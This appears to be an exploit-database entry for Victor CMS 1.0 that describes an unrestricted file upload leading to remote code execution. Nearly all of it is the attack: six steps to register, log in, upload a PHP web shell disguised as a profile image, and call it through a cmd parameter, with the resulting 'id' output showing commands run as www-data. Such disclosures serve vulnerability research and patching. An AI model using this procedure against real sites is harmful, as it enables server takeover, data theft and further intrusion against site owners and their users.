victor cms 1.0 file upload to rce
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
# Exploit Title: Victor CMS 1.0 - File Upload To RCE # Date: 20.12.2020 # Exploit Author: Mosaaed # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: 1.0 # Tested on: Apache2/Linux Step1: register http://localhost/CMSsite-master/register.php step2: login as user step3: Go to Profile step4: upload imag as php file (upload shell.php) step5: update user step6: You will find your shell in img folder :/path/img/cmd.php http://localhost/CMSsite-master/img/cmd.php?cmd=id uid=33(www-data) gid=33(www-data) groups=33(www-data)
Victor cms 1.0 file upload to rce Vulnerability / Exploit Source : Victor cms 1.0 file upload to rce